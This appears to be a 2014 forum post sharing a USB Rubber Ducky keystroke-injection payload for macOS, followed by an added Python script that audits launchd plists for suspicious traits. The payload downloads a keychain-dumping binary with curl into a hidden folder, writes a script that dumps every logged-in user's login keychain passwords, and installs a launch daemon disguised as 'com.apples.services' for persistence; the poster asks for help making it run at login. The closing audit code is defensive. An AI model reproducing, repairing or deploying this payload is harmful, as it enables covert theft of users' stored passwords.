IsaiahJTurner
Posted May 30, 2014 (edited)

I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue.

First off, the source can be found on https://github.com/IsaiahJTurner/duckdump. I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine.

The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I want it to run automatically as soon as the user logs in. Any help?

Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor

REM Isaiah Turner
REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login.
REM Please do not use this for evil, this is for educational purposes only.
REM http://isaiahjturner.com
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/sh
ENTER
STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump'
ENTER
STRING chmod +x /Library/.hidden/keychaindump
ENTER
STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc
ENTER
STRING do
ENTER
STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2)
ENTER
STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt
ENTER
STRING done' > /Library/.hidden/dump.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/dump.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/dump.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist

Edited May 30, 2014 by IsaiahJTurner
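For defenders auditing a Mac for this kind of persistence, here is an added example (not part of the original post or the duckdump project) that parses a launchd job definition and flags the traits the plist in the post exhibits. The function name, the finding strings and the second sample plist are constructed for illustration.

```python
import plistlib
from pathlib import PurePosixPath

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

def audit_launchd_job(data):
    """Return a list of findings for one launchd plist given as bytes."""
    job = plistlib.loads(data)
    label = job.get("Label", "")
    args = list(job.get("ProgramArguments") or [])
    if not args and "Program" in job:
        args = [job["Program"]]
    findings = []
    # Label that resembles Apple's namespace but is not inside "com.apple."
    if label.startswith("com.apple") and not label.startswith("com.apple."):
        findings.append("label-imitates-apple")
    # Absolute path argument that sits under a dot-prefixed (hidden) directory
    for arg in args:
        if arg.startswith("/") and any(
                p.startswith(".") for p in PurePosixPath(arg).parts):
            findings.append("hidden-path:" + arg)
    # Shell interpreter used to launch a script
    if len(args) > 1 and args[0] in SHELLS:
        findings.append("shell-wrapper")
    # Starts at load and leaves child processes running after the job exits
    if job.get("RunAtLoad") is True and job.get("AbandonProcessGroup") is True:
        findings.append("runatload+abandonprocessgroup")
    return findings

# The plist from the post, reassembled without the keystroke markers.
POSTED_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>com.apples.services</string>
<key>ProgramArguments</key>
<array><string>/bin/sh</string><string>/Library/.hidden/dump.sh</string></array>
<key>RunAtLoad</key><true/>
<key>AbandonProcessGroup</key><true/>
</dict></plist>"""

# Constructed benign job for contrast (label and path are made up).
BENIGN_PLIST = b"""<plist version="1.0"><dict>
<key>Label</key><string>org.example.backupd</string>
<key>Program</key><string>/usr/local/bin/backupd</string>
<key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, data in (("posted", POSTED_PLIST), ("benign", BENIGN_PLIST)):
        print(name, audit_launchd_job(data))
```

To audit a live system, feed it the bytes of each file in /Library/LaunchDaemons and /Library/LaunchAgents and review any job that returns findings.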